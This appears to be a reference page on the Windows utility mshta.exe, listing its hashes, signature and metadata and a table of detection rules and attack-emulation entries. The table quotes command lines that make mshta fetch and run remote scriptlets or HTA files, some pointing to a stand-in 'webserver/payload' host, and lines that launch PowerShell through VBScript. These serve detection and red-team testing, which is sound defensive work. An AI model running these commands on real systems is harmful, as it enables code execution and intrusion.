mshta.exe

  • File Path: C:\WINDOWS\system32\mshta.exe
  • Description: Microsoft (R) HTML Application host

Hashes

Type Hash
MD5 356E04E106F6987A19938DF67DEA0B76
SHA1 F2FD7CDE5F97427E497DFB07B7F682149DC896FB
SHA256 4ED8A115FA1DCFD532397B800775C1B54D2D407B52118B5423E94FF1CE855D7E
SHA384 CD85F801F461E8FB6656310396A7DF94AAE035DE1A0A0F9EC07062D6653D94559E00420F6F0D8F7141FD31AC8B9DD33D
SHA512 DF1C655FA3A95E001084AF8C3AA97C54DBCB690210E1353DD836702CFB4AF3C857449DF62AA62D7AB525FFB4E0DC1552181DFCDEE2C28F4AF5C20DF6D95811CD
SSDEEP 192:FXr2qjWSWvrCpspQlu/ZwvdlC5EY/S99PXWwKLIR:FXFL0WpsdZdY9/WwK
IMP DCDEE2FF2311B9AE7C4D768FA56524DD
PESHA1 34C72E42C5FB7361C124CE41A6E37103277A51FC
PE256 5300FA8BBA3F0085F2AB19E6A9BAC6F9E979ABE9583D898874F47B848BE97E63

Runtime Data

Loaded Modules:

Path
C:\WINDOWS\System32\KERNEL32.DLL
C:\WINDOWS\System32\KERNELBASE.dll
C:\WINDOWS\system32\mshta.exe
C:\WINDOWS\System32\msvcrt.dll
C:\WINDOWS\SYSTEM32\ntdll.dll

Signature

  • Status: Signature verified.
  • Serial: 33000002ED2C45E4C145CF48440000000002ED
  • Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: MSHTA.EXE.MUI
  • Product Name: Internet Explorer
  • Company Name: Microsoft Corporation
  • File Version: 11.00.22000.1 (WinBuild.160101.0800)
  • Product Version: 11.00.22000.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/73
  • VirusTotal Link: https://www.virustotal.com/gui/file/4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e/detection

Possible Misuse

The following table contains possible examples of mshta.exe being misused. While mshta.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma godmode_sigma_rule.yml - '\mshta.exe' DRL 1.0
sigma win_invoke_obfuscation_via_use_mshta_services_security.yml title: Invoke-Obfuscation Via Use MSHTA DRL 1.0
sigma win_invoke_obfuscation_via_use_mshta_services_security.yml description: Detects Obfuscated Powershell via use MSHTA in Scripts DRL 1.0
sigma win_invoke_obfuscation_via_use_mshta_services_security.yml - 'mshta' DRL 1.0
sigma win_invoke_obfuscation_via_use_mshta_services.yml title: Invoke-Obfuscation Via Use MSHTA DRL 1.0
sigma win_invoke_obfuscation_via_use_mshta_services.yml description: Detects Obfuscated Powershell via use MSHTA in Scripts DRL 1.0
sigma win_invoke_obfuscation_via_use_mshta_services.yml - 'mshta' DRL 1.0
sigma sysmon_cactustorch.yml - '\System32\mshta.exe' DRL 1.0
sigma sysmon_suspicious_remote_thread.yml - '\mshta.exe' DRL 1.0
sigma file_event_win_susp_clr_logs.yml - 'mshta' DRL 1.0
sigma file_event_win_win_shell_write_susp_directory.yml - '\mshta.exe' DRL 1.0
sigma image_load_suspicious_dbghelp_dbgcore_load.yml - '\mshta.exe' DRL 1.0
sigma image_load_susp_script_dotnet_clr_dll_load.yml - '\mshta.exe' DRL 1.0
sigma posh_pm_invoke_obfuscation_via_use_mhsta.yml title: Invoke-Obfuscation Via Use MSHTA DRL 1.0
sigma posh_pm_invoke_obfuscation_via_use_mhsta.yml description: Detects Obfuscated Powershell via use MSHTA in Scripts DRL 1.0
sigma posh_pm_invoke_obfuscation_via_use_mhsta.yml Payload\|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' DRL 1.0
sigma posh_ps_invoke_obfuscation_via_use_mhsta.yml title: Invoke-Obfuscation Via Use MSHTA DRL 1.0
sigma posh_ps_invoke_obfuscation_via_use_mhsta.yml description: Detects Obfuscated Powershell via use MSHTA in Scripts DRL 1.0
sigma posh_ps_invoke_obfuscation_via_use_mhsta.yml ScriptBlockText\|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' DRL 1.0
sigma proc_creation_win_apt_babyshark.yml - powershell.exe mshta.exe http* DRL 1.0
sigma proc_creation_win_apt_lazarus_activity_apr21.yml - 'mshta' DRL 1.0
sigma proc_creation_win_apt_lazarus_activity_apr21.yml - 'C:\Windows\System32\mshta.exe' DRL 1.0
sigma proc_creation_win_apt_ta505_dropper.yml description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents DRL 1.0
sigma proc_creation_win_apt_ta505_dropper.yml Image\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_exploit_cve_2017_11882.yml description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe DRL 1.0
sigma proc_creation_win_invoke_obfuscation_via_use_mhsta.yml title: Invoke-Obfuscation Via Use MSHTA DRL 1.0
sigma proc_creation_win_invoke_obfuscation_via_use_mhsta.yml description: Detects Obfuscated Powershell via use MSHTA in Scripts DRL 1.0
sigma proc_creation_win_invoke_obfuscation_via_use_mhsta.yml CommandLine\|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' DRL 1.0
sigma proc_creation_win_lethalhta.yml title: MSHTA Spwaned by SVCHOST DRL 1.0
sigma proc_creation_win_lethalhta.yml description: Detects MSHTA.EXE spwaned by SVCHOST as seen in LethalHTA and described in report DRL 1.0
sigma proc_creation_win_lethalhta.yml Image\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_lolbins_by_office_applications.yml - 'mshta' DRL 1.0
sigma proc_creation_win_lolbins_with_wmiprvse_parent_process.yml - 'mshta' DRL 1.0
sigma proc_creation_win_mshta_javascript.yml title: Mshta JavaScript Execution DRL 1.0
sigma proc_creation_win_mshta_javascript.yml description: Identifies suspicious mshta.exe commands. DRL 1.0
sigma proc_creation_win_mshta_javascript.yml Image\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_mshta_spawn_shell.yml title: MSHTA Spawning Windows Shell DRL 1.0
sigma proc_creation_win_mshta_spawn_shell.yml description: Detects a Windows command line executable started from MSHTA DRL 1.0
sigma proc_creation_win_mshta_spawn_shell.yml ParentImage\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml - 'mshta' DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml - '*mshta*' DRL 1.0
sigma proc_creation_win_office_shell.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_outlook_shell.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_possible_applocker_bypass.yml #- '\mshta.exe' DRL 1.0
sigma proc_creation_win_public_folder_parent.yml - 'mshta.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - 'mshta.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - 'mshta.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_script_event_consumer_spawn.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_shell_spawn_mshta.yml title: Mshta Spawning Windows Shell DRL 1.0
sigma proc_creation_win_shell_spawn_mshta.yml description: Detects a suspicious child process of a mshta.exe process DRL 1.0
sigma proc_creation_win_shell_spawn_mshta.yml ParentImage\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_shell_spawn_susp_program.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_covenant.yml - 'mshta file.hta' DRL 1.0
sigma proc_creation_win_susp_csc.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_mshta_execution.yml title: MSHTA Suspicious Execution 01 DRL 1.0
sigma proc_creation_win_susp_mshta_execution.yml description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism DRL 1.0
sigma proc_creation_win_susp_mshta_execution.yml Image\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_mshta_pattern.yml title: Suspicious MSHTA Process Patterns DRL 1.0
sigma proc_creation_win_susp_mshta_pattern.yml description: Detects suspicious mshta process patterns DRL 1.0
sigma proc_creation_win_susp_mshta_pattern.yml - https://www.echotrail.io/insights/search/mshta.exe DRL 1.0
sigma proc_creation_win_susp_mshta_pattern.yml Image\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_mshta_pattern.yml - 'mshta.exe' DRL 1.0
sigma proc_creation_win_susp_mshta_pattern.yml - 'mshta' DRL 1.0
sigma proc_creation_win_susp_powershell_parent_process.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_regsvr32_anomalies.yml ParentImage\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_env_folder.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_env_folder.yml - 'mshta.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_temp.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_servu_process_pattern.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java_keytool.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_system_user_anomaly.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_task_folder_evasion.yml description: The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr DRL 1.0
sigma driver_load_invoke_obfuscation_via_use_mshta_services.yml title: Invoke-Obfuscation Via Use MSHTA DRL 1.0
sigma driver_load_invoke_obfuscation_via_use_mshta_services.yml description: Detects Obfuscated Powershell via use MSHTA in Scripts DRL 1.0
sigma driver_load_invoke_obfuscation_via_use_mshta_services.yml ImagePath\|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' DRL 1.0
LOLBAS Mshta.yml Name: Mshta.exe  
LOLBAS Mshta.yml - Command: mshta.exe evilfile.hta  
LOLBAS Mshta.yml - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))  
LOLBAS Mshta.yml - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();  
LOLBAS Mshta.yml - Command: mshta.exe "C:\ads\file.txt:file.hta"  
LOLBAS Mshta.yml - Path: C:\Windows\System32\mshta.exe  
LOLBAS Mshta.yml - Path: C:\Windows\SysWOW64\mshta.exe  
LOLBAS Mshta.yml - IOC: mshta.exe executing raw or obfuscated script within the command-line  
LOLBAS Mshta.yml - IOC: DotNet CLR libraries loaded into mshta.exe  
LOLBAS Mshta.yml - IOC: DotNet CLR Usage Log - mshta.exe.log  
LOLBAS Mshta.yml - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct  
LOLBAS Mshtml.yml Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box).  
LOLBAS Url.yml Usecase: Invoke an HTML Application via mshta.exe (Default Handler).  
atomic-red-team index.md - T1218.005 Mshta MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #10: Mshta used to Execute PowerShell [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #9: Powershell invoke mshta.exe download [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1218.005 Mshta MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #10: Mshta used to Execute PowerShell [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #9: Powershell invoke mshta.exe download [windows] MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | SSH Authorized Keys | Systemd Timers | Mshta | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | Screensaver | Time Providers CONTRIBUTE A TEST | Mshta | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md - Atomic Test #9 - Powershell invoke mshta.exe download MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md ## Atomic Test #9 - Powershell invoke mshta.exe download MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display “Download Cradle test success!”. MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md | url | url of payload to execute | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct| MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md C:\Windows\system32\cmd.exe /c “mshta.exe javascript:a=GetObject(‘script:#{url}’).Exec();close()” MIT License. © 2018 Red Canary
atomic-red-team T1059.005.md Get-WmiObject win32process | Where-Object {$.CommandLine -like “mshta”} | % { “$(Stop-Process $_.ProcessID)” } | Out-Null MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md Stop-Process -name mshta MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md # T1218.005 - Mshta MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md <blockquote>Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications) MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer’s security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md - Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md - Atomic Test #2 - Mshta executes VBScript to execute malicious command MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md - Atomic Test #3 - Mshta Executes Remote HTML Application (HTA) MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md - Atomic Test #10 - Mshta used to Execute PowerShell MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md ## Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md | file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct| MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md mshta.exe javascript:a=(GetObject(‘script:#{file_url}’)).Exec();close(); MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md ## Atomic Test #2 - Mshta executes VBScript to execute malicious command MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems. MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md mshta vbscript:Execute(“CreateObject(““Wscript.Shell””).Run ““powershell -noexit -file PathToAtomicsFolder\T1218.005\src\powershell.ps1”“:close”) MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md ## Atomic Test #3 - Mshta Executes Remote HTML Application (HTA) MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md mshta “#{temp_file}” MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md | mshta_file_path | Location of mshta.exe | String | $env:windir\system32\mshta.exe| MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md | mshta_file_path | Location of mshta.exe | Path | $env:windir\system32\mshta.exe| MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md ## Atomic Test #10 - Mshta used to Execute PowerShell MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Use Mshta to execute arbitrary PowerShell. Example is from the 2021 Threat Detection Report by Red Canary. MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md mshta.exe “about:'" MIT License. © 2018 Red Canary
signature-base apt_babyshark.yar $x2 = /mshta.exe http:\/\/[a-z0-9.\/]{5,30}.hta/ CC BY-NC 4.0
signature-base apt_fin7.yar $x7 = “7374656d33325c6d736874612e657865000023002e002e005c002e002e005c002e002e005c00570069006e0064006f00770073005c005300790073007400” ascii /* hex encoded string ‘stem32\mshta.exe#......\Windows\Syst’ */ CC BY-NC 4.0
signature-base apt_leviathan.yar $x2 = “.Run "taskkill /im mshta.exe” ascii CC BY-NC 4.0
signature-base exploit_cve_2017_11882.yar $x1 = “4d534854412e4558452068747470” /* MSHTA.EXE http */ CC BY-NC 4.0
signature-base exploit_cve_2017_11882.yar $x2 = “6d736874612e6578652068747470” /* mshta.exe http */ CC BY-NC 4.0
signature-base exploit_cve_2017_11882.yar $x3 = “6d736874612068747470” /* mshta http */ CC BY-NC 4.0
signature-base exploit_cve_2017_11882.yar $x4 = “4d534854412068747470” /* MSHTA http */ CC BY-NC 4.0
signature-base exploit_cve_2017_11882.yar $mshta = “mshta” CC BY-NC 4.0
signature-base exploit_cve_2017_11882.yar any of ($mshta, $http, $https, $cmd, $pwsh, $exe) and any of ($equation1, $equation2) and $address CC BY-NC 4.0
signature-base exploit_cve_2017_8759.yar $s2 = /<soap:address location=”http[s]?:\/\/[^”]{8,140}mshta.exe”/ ascii wide CC BY-NC 4.0
signature-base gen_mal_scripts.yar description = “Detects MSHTA Bypass” CC BY-NC 4.0
signature-base gen_mal_scripts.yar $s3 = “/c start mshta j” ascii nocase CC BY-NC 4.0
signature-base gen_url_persitence.yar $file1 = /\x0a\x0d\s=[^\x0d](powershell|cmd|certutil|mshta|wscript|cscript|rundll32|wmic|regsvr32|msbuild)(.exe|)[^\x0d]{2,50}\x0d/ nocase CC BY-NC 4.0

MIT License. Copyright (c) 2020-2021 Strontic.